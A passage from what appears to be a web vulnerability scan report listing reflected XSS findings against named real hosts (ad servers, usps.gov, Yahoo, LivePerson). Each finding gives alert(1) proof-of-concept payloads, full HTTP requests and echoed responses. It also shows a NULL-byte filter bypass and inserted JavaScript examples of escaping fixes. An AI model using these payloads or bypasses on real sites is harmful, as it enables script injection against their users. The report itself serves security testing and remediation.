ents,eVar1,eVar2,prop1,eVar7,eVar11,eVar10,prop10,eVar6"; s.linkTrackEvents = "event1"; s.dc = 112; s.eVar10 = s_account; s.prop10 = s_account; s.campaign = '' ; s.prop1 = 'WebAnalysis' ; s.prop2 = 'en434e0\\';alert(1)//c3ce629f4e0' ; s.prop3 = '/WebAnalysis/APP/GenerateCode.ashx' ; GameCatalog.WebAnalysis.SiteTracking['game']= { 'pageName' : 'GamePage - [Mystery Age Imperial Staff]' , 'products' : ';Mystery Age Imperial Staff'
...[SNIP]...

2.45. http://ib.adnxs.com/seg [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c810'%3balert(1)//01b28dbf622 was submitted in the redir parameter. This input was echoed as 2c810';alert(1)//01b28dbf622 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /seg?add=155746&redir=${SEG_IDS}2c810'%3balert(1)//01b28dbf622&t=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; sess=1; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 07-Sep-2011 12:46:31 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-18; path=/; expires=Mon, 05-Dec-2011 12:46:31 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0uQsu#'0AK.2BD)8JE^N(7nZs3ht</s2t.vO)!%C9MfYBDro4%$RXj*VXG`FnPjma[wF*_)<q[y1WP9e8pC8`#5O?0/><2+:3wu0usM@nf1dht<oQOZgDK+C#1JIHqN@hU=SVr%o_v%pV$Tn'!-5)NXI#wq; path=/; expires=Mon, 05-Dec-2011 12:46:31 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 12:46:31 GMT
Content-Length: 484

document.write('<img src="http://ad.doubleclick.net/activity;src=2055485;dcnet=4845;boom=52987;sz=1x1;ord=1?" width="1" height="1"/>');document.write('<img src="http://b.scorecardresearch.com/b?c1=8&c
...[SNIP]...
<scr'+'ipt type="text/javascript" src="${SEG_IDS}2c810';alert(1)//01b28dbf622">
...[SNIP]...

2.46. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3484/103250/GGGreen_Flash_300x250_LPC.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fa3a"%3balert(1)//ba80aca61be was submitted in the mpck parameter. This input was echoed as 5fa3a";alert(1)//ba80aca61be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/3484/103250/GGGreen_Flash_300x250_LPC.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3484-103250-2056-0%3Fmpt%3D21341037515fa3a"%3balert(1)//ba80aca61be&mpt=2134103751&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DB--PrVhhmTpXRMprmjQSu78WoAvWx35EClYfx3xq515WrPuCi5AEQARgBIKittBQ4AGDJ1vqGyKOgGbIBDnd3dy5teWZpdHYuY29tugEKMzAweDI1MF9hc8gBCdoBQWh0dHA6Ly93d3cubXlmaXR2LmNvbS9zZWFyY2g_cXVlcnk9WFMlRUYlQkYlQkRkYWNlO2FsZXJ0KDEpLy9iYWNruAIYwAIGyALr9M8M4AIA6gIKMjg0ODM1Njc5NZADrAKYA-ADqAMB0QOyxxpSLRKzBPUDAAgAxMgEAeAEAaAGEQ%2526num%253D1%2526sig%253DAOD64_3qs0lOVYYCU9__uy2v7b56S6k4_Q%2526client%253Dca-pub-2043876247497391%2526adurl%253D HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?query=XS%EF%BF%BDdace;alert(1)//back
Cookie: svid=319726075672; mojo3=3484:2056/17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:56:25 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 00:13:06 GMT
ETag: "3ecbcf-c0b-4870f8e26a880"
Accept-Ranges: bytes
Content-Length: 10066
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
0QOyxxpSLRKzBPUDAAgAxMgEAeAEAaAGEQ%26num%3D1%26sig%3DAOD64_3qs0lOVYYCU9__uy2v7b56S6k4_Q%26client%3Dca-pub-2043876247497391%26adurl%3Dhttp://altfarm.mediaplex.com/ad/ck/3484-103250-2056-0?mpt=21341037515fa3a";alert(1)//ba80aca61be\" target=\"_blank\">
...[SNIP]...

2.47. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3484/103250/GGGreen_Flash_300x250_LPC.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9293a"%3balert(1)//ef5b805385b was submitted in the mpvc parameter. This input was echoed as 9293a";alert(1)//ef5b805385b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/3484/103250/GGGreen_Flash_300x250_LPC.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3484-103250-2056-0%3Fmpt%3D2134103751&mpt=2134103751&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DB--PrVhhmTpXRMprmjQSu78WoAvWx35EClYfx3xq515WrPuCi5AEQARgBIKittBQ4AGDJ1vqGyKOgGbIBDnd3dy5teWZpdHYuY29tugEKMzAweDI1MF9hc8gBCdoBQWh0dHA6Ly93d3cubXlmaXR2LmNvbS9zZWFyY2g_cXVlcnk9WFMlRUYlQkYlQkRkYWNlO2FsZXJ0KDEpLy9iYWNruAIYwAIGyALr9M8M4AIA6gIKMjg0ODM1Njc5NZADrAKYA-ADqAMB0QOyxxpSLRKzBPUDAAgAxMgEAeAEAaAGEQ%2526num%253D1%2526sig%253DAOD64_3qs0lOVYYCU9__uy2v7b56S6k4_Q%2526client%253Dca-pub-2043876247497391%2526adurl%253D9293a"%3balert(1)//ef5b805385b HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?query=XS%EF%BF%BDdace;alert(1)//back
Cookie: svid=319726075672; mojo3=3484:2056/17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:56:27 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 00:13:06 GMT
ETag: "3ecbcf-c0b-4870f8e26a880"
Accept-Ranges: bytes
Content-Length: 10042
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
ZXJ0KDEpLy9iYWNruAIYwAIGyALr9M8M4AIA6gIKMjg0ODM1Njc5NZADrAKYA-ADqAMB0QOyxxpSLRKzBPUDAAgAxMgEAeAEAaAGEQ%26num%3D1%26sig%3DAOD64_3qs0lOVYYCU9__uy2v7b56S6k4_Q%26client%3Dca-pub-2043876247497391%26adurl%3D9293a";alert(1)//ef5b805385bhttp://altfarm.mediaplex.com%2Fad%2Fck%2F3484-103250-2056-0%3Fmpt%3D2134103751&clickTag=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DB--PrVhhmTpXRMprmjQSu78WoAvWx35EClYfx3xq515WrPuCi5AEQARgBIK
...[SNIP]...

2.48. http://ips-invite.iperceptions.com/webValidator.aspx [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ips-invite.iperceptions.com
Path:   /webValidator.aspx

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0049fa0'%3balert(1)//a0cbc58a018 was submitted in the loc parameter. This input was echoed as 49fa0';alert(1)//a0cbc58a018 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked. In the response below the NULL byte has been replaced by a full stop (STUDY.49fa0'), while the characters after it reached the script context unmodified.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
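The following is an added example, not code from the report or from the scanned site. It models the bypass described for issue 2.48: a filter that treats the parameter as a C string inspects only the bytes before the NUL, while the managed application keeps the whole value and copies it into a quoted JavaScript literal. The blocked-character list, the control-character check and the hardened renderer are assumptions for illustration; the payload and the shape of the echoed line are taken from the report.

```javascript
// Added example (not from the report). Models the NULL-byte filter bypass of
// issue 2.48 and a fix applied on the full decoded value.

// Assumed blocklist of a typical XSS filter (illustration only).
const BLOCKED = /['"<>;]/;

// Payload from the report, URL-decoded: "STUDY", a NUL byte, then the injection.
const PAYLOAD = decodeURIComponent("STUDY%0049fa0'%3balert(1)//a0cbc58a018");

// Native-code filter: C string routines (strstr, strchr, ...) stop at the first
// NUL, so only the prefix before \0 is ever inspected.
function nativeFilterAllows(decoded) {
  const asCString = decoded.split('\0')[0];
  return !BLOCKED.test(asCString);
}

// The managed application sees the whole string. The observed response shows the
// NUL rendered as '.', with the remainder copied unescaped into a single-quoted
// literal, which is what this template reproduces.
function renderVulnerable(decoded) {
  return "var loc= '" + decoded.replace(/\0/g, '.') + "';";
}

// Fix, step 1: validate in the application over the full decoded value. A NUL or
// any other control character has no legitimate place in a location name.
function fullValueIsAcceptable(decoded) {
  return !/[\u0000-\u001f\u007f]/.test(decoded);
}

// Fix, step 2: encode for the JavaScript string context instead of relying on a
// blocklist. JSON.stringify escapes backslash, double quote and control
// characters; '<' is replaced so the literal can never close an inline <script>.
function renderHardened(decoded) {
  if (!fullValueIsAcceptable(decoded)) {
    throw new Error('loc rejected: control character in value');
  }
  return 'var loc= ' + JSON.stringify(decoded).replace(/</g, '\\u003c') + ';';
}

function demo() {
  return [
    'native filter allows payload: ' + nativeFilterAllows(PAYLOAD),
    renderVulnerable(PAYLOAD),
    'full-value check accepts payload: ' + fullValueIsAcceptable(PAYLOAD),
    renderHardened('STUDY'),
  ];
}
if (typeof require !== 'undefined' && require.main === module) console.log(demo().join('\n'));
```

The first line of the demo output is the bypass: the filter sees only STUDY and passes the request, and the second line is byte-for-byte the script line in the response above. Fixing the WAF alone is not enough, because the application still emits the value without encoding; the hardened renderer closes the hole regardless of what sits in front of it.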

Request

GET /webValidator.aspx?sdfc=9014a8fa-937-a77aeb94-4e7a-4e23-a045-ac680a9b8baa&lID=1&loc=STUDY%0049fa0'%3balert(1)//a0cbc58a018&cD=90&rF=False&iType=1&domainname=0 HTTP/1.1
Host: ips-invite.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE02
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Tue, 06 Sep 2011 12:46:59 GMT
Content-Length: 1330

var sID= '937'; var sC= 'IPE937';var rF='False'; var brow= 'Chrome'; var vers= '13'; var lID= '1'; var loc= 'STUDY.49fa0';alert(1)//a0cbc58a018'; var ps='sdfc=9014a8fa-937-a77aeb94-4e7a-4e23-a045-ac680a9b8baa&lID=1&loc=STUDY%0049fa0%27%3balert(1)%2f%2fa0cbc58a018&cD=90&rF=False&iType=1&domainname=0';var IPEspeed = 5;var _invite = 'ips-invite'
...[SNIP]...

2.49. http://postcalc.usps.gov/CombineScriptsHandler.ashx [_TSM_HiddenField_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://postcalc.usps.gov
Path:   /CombineScriptsHandler.ashx

Issue detail

The value of the _TSM_HiddenField_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c214d'%3balert(1)//ba0b57bcc30 was submitted in the _TSM_HiddenField_ parameter. This input was echoed as c214d';alert(1)//ba0b57bcc30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CombineScriptsHandler.ashx?_TSM_HiddenField_=ctl00_ToolkitScriptManager1_HiddenFieldc214d'%3balert(1)//ba0b57bcc30&_TSM_CombinedScripts_=%3b%3bAjaxControlToolkit%2c+Version%3d1.0.11119.20010%2c+Culture%3dneutral%2c+PublicKeyToken%3d28f01b0e84b6d53e%3aen-US%3af115bb7c-9ed9-4839-b013-8ca60f25e300%3ae2e86ef9%3a1df13a87%3afde3863c%3aa9a7729d%3a9ea3f0e2%3a9e8e87e9%3a4c9865be%3aba594826%3a507fcf1b%3ac7a4182e HTTP/1.1
Host: postcalc.usps.gov
Proxy-Connection: keep-alive
Referer: http://postcalc.usps.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_qptudbmdfb_80=ffffffff3b223e1e45525d5f4f58455e445a4a421548

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: application/x-javascript
Content-Length: 161049
Vary: Accept-Encoding
Cache-Control: public, max-age=3583
Expires: Tue, 06 Sep 2011 13:52:50 GMT
Date: Tue, 06 Sep 2011 12:53:07 GMT
Connection: close

//START AjaxControlToolkit.Common.Common.js
Type.registerNamespace('AjaxControlToolkit');AjaxControlToolkit.BoxSide = function() {
}
AjaxControlToolkit.BoxSide.prototype = {
Top : 0,
Right : 1,

...[SNIP]...
/END AjaxControlToolkit.Calendar.CalendarBehavior.js
if(typeof(Sys)!=='undefined')Sys.Application.notifyScriptLoaded();
(function() {var fn = function() {$get('ctl00_ToolkitScriptManager1_HiddenFieldc214d';alert(1)//ba0b57bcc30').value += ';;AjaxControlToolkit, Version=1.0.11119.20010, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e:en-US:f115bb7c-9ed9-4839-b013-8ca60f25e300:e2e86ef9:1df13a87:fde3863c:a9a7729d:9ea3f0e2:9e8e
...[SNIP]...

2.50. http://query.yahooapis.com/v1/public/yql/uhTrending/cokeTrending2 [limit parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://query.yahooapis.com
Path:   /v1/public/yql/uhTrending/cokeTrending2

Issue detail

The value of the limit request parameter is copied into the response body. The payload 155ee<script>alert(1)</script>7012a81052a was submitted in the limit parameter. This input was echoed unmodified in the application's response, inside the error message of a JSONP callback.

This proof-of-concept attack demonstrates that the markup is reflected unmodified. Note, however, that the response is served with Content-Type: text/javascript;charset=utf-8 and is a JSONP callback rather than an HTML document, so the reflected tags are only interpreted as HTML if a browser can be induced to treat this response as an HTML document. Exploitability therefore depends on how the endpoint is consumed and should be confirmed manually before the finding is reported at this severity.

Request

GET /v1/public/yql/uhTrending/cokeTrending2?format=json&callback=YAHOO_one_uh.popularSearches&_maxage=1800&diagnostics=false&limit=1155ee<script>alert(1)</script>7012a81052a HTTP/1.1
Host: query.yahooapis.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Content-Type: text/javascript;charset=utf-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:34 GMT
Server: YTS/1.19.8
Age: 0
Proxy-Connection: keep-alive
Content-Length: 178

YAHOO_one_uh.popularSearches({"error":{"lang":"en-US","description":"Invalid value for variable 'limit' expecting an integer got '1155ee<script>alert(1)</script>7012a81052a'"}});

2.51. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload 8a937%0a857122958df was submitted in the site parameter. This input was echoed as 8a937
857122958df
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript comment into which our data is being copied, so that whatever follows the line break is parsed as code. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
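The following is an added example, not code from the report or from any of the scanned sites. It serves two of the findings in this section: the backslash bypass of issue 2.44, where only quotation marks were escaped, and the line-break termination of the rest-of-line comment in issue 2.51. The payloads are the ones recorded in the report (2.43, 2.44 and 2.51); the two server-side templates, the quote-only escaper and the hardened encoder are assumptions that reproduce the shape of the echoed lines, and the small lexer exists only to show mechanically whether the user data stayed inside the literal.

```javascript
// Added example (not from the report). Shows why quote-only escaping is bypassed
// by a user-supplied backslash (2.44), why a line break ends a // comment (2.51),
// and an encoder for a quoted JavaScript string that survives both.

// Payloads from the report, URL-decoded as the server would see them.
const PAYLOAD_PLAIN_QUOTE = decodeURIComponent("59505'%3balert(1)//f0a2d5e98b9");      // 2.43
const PAYLOAD_BACKSLASH_QUOTE = decodeURIComponent("434e0\\'%3balert(1)//c3ce629f4e0"); // 2.44
const PAYLOAD_NEWLINE = decodeURIComponent('218075578a937%0a857122958df');              // 2.51

// The defence described in 2.44: a backslash before each quote, nothing else.
function escapeQuotesOnly(s) {
  return s.replace(/'/g, "\\'");
}

// Backslash is doubled FIRST; doing it after the quote step would re-break the
// quote escapes. Line terminators are encoded so the value can never end a
// string, a // comment or a line; < and > keep it from closing an inline <script>.
function escapeForJsString(s) {
  return s
    .replace(/\\/g, '\\\\')
    .replace(/'/g, "\\'")
    .replace(/"/g, '\\"')
    .replace(/\r/g, '\\r')
    .replace(/\n/g, '\\n')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029')
    .replace(/</g, '\\x3c')
    .replace(/>/g, '\\x3e')
    .replace(/\0/g, '\\x00');
}

// Assumed server-side templates modelled on the two responses in the report.
function renderAssignment(encoder, value) {   // GenerateCode.ashx: s.prop2 = '...';
  return "s.prop2 = '" + encoder(value) + "';";
}
function renderComment(encoder, value) {      // deploy.asp: //Plugins for site ...
  return '//Plugins for site ' + encoder(value);
}

// Minimal lexer for a single-quoted literal: a backslash always consumes the next
// character, a bare quote closes the literal, a raw line terminator is a syntax
// error. Returns the index just past the closing quote, or -1.
function endOfSingleQuotedLiteral(src, start) {
  let i = start + 1;
  while (i < src.length) {
    const c = src[i];
    if (c === '\\') { i += 2; continue; }
    if (c === "'") return i + 1;
    if (c === '\n' || c === '\r' || c === '\u2028' || c === '\u2029') return -1;
    i += 1;
  }
  return -1;
}

// True only if the whole user value stayed inside the literal, i.e. the text after
// the closing quote is exactly the template's trailing ';'.
function literalStaysClosed(line) {
  const end = endOfSingleQuotedLiteral(line, line.indexOf("'"));
  return end !== -1 && line.slice(end) === ';';
}

// A rest-of-line comment has exactly one terminator: a line break.
function commentStaysClosed(line) {
  return !/[\r\n\u2028\u2029]/.test(line);
}

function demo() {
  const naive = renderAssignment(escapeQuotesOnly, PAYLOAD_BACKSLASH_QUOTE);
  const fixed = renderAssignment(escapeForJsString, PAYLOAD_BACKSLASH_QUOTE);
  const comment = renderComment(escapeForJsString, PAYLOAD_NEWLINE);
  return [
    naive, '  closed: ' + literalStaysClosed(naive),
    fixed, '  closed: ' + literalStaysClosed(fixed),
    comment, '  closed: ' + commentStaysClosed(comment),
  ];
}
if (typeof require !== 'undefined' && require.main === module) console.log(demo().join('\n'));
```

The first demo line reproduces the echoed s.prop2 assignment from issue 2.44 (the application's lone backslash plus the attacker's, then a live quote), and the lexer reports that the literal closed early. JSON.stringify is the idiomatic alternative to a hand-written encoder for the string case, since it escapes backslashes, both quote characters and control characters, but it leaves < untouched, so the replacement of < still needs to be applied before the value is placed inside an inline script block.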

Request

GET /visitor/addons/deploy.asp?site=218075578a937%0a857122958df&d_id=scottrade HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315262431881

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2141
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDASQRDBTD=EKEPPJLBDDNCLJEIBDBOFDGL; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 218075578a937
857122958df

lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maem
...[SNIP]...

2.52. http://show.partners-z.com/s/show [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://show.partners-z.com
Path:   /s/show

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ae04b<script>alert(1)</script>6304665d48a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The reflection occurs inside a Python traceback that the server returns to the client; the traceback also discloses a server-side file path and component version (showcase-display-server-1.4.12/server/param_mapper.py), which is a separate information-leakage issue that should be addressed by returning a generic error page.

Request

GET /s/show?chan=YAHOO&prid=dcd1ff2f79f8a83b9c960316c4f85cf1&uuid=3c7f76504307f88c4e126d344670b7cc&zip=10010&ae04b<script>alert(1)</script>6304665d48a=1 HTTP/1.1
Host: show.partners-z.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:18 GMT
Server: Apache/2.2.9 (Debian)
Cache-Control: max-age=0, no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 892
Content-Type: text/html; charset=UTF-8

<html><head></head><body style="width:300px;height:200px;overflow:hidden;border:0px;margin:5px;text-align:center"><div id="haiku" style="height:3em;position:relative;top:50%;margin-top:-2em; color:#D2
...[SNIP]...
ces/showcase-display-server-1.4.12/server/param_mapper.py", line 121, in convert_params
raise InvalidParameterException ("unknown parameter (%s)" % k)
InvalidParameterException: unknown parameter (ae04b<script>alert(1)</script>6304665d48a)
</div>
...[SNIP]...

2.53. http://utdi.reachlocal.com/coupon/ [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e78be"><script>alert(1)</script>08a96ad64a0 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=e78be"><script>alert(1)</script>08a96ad64a0&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
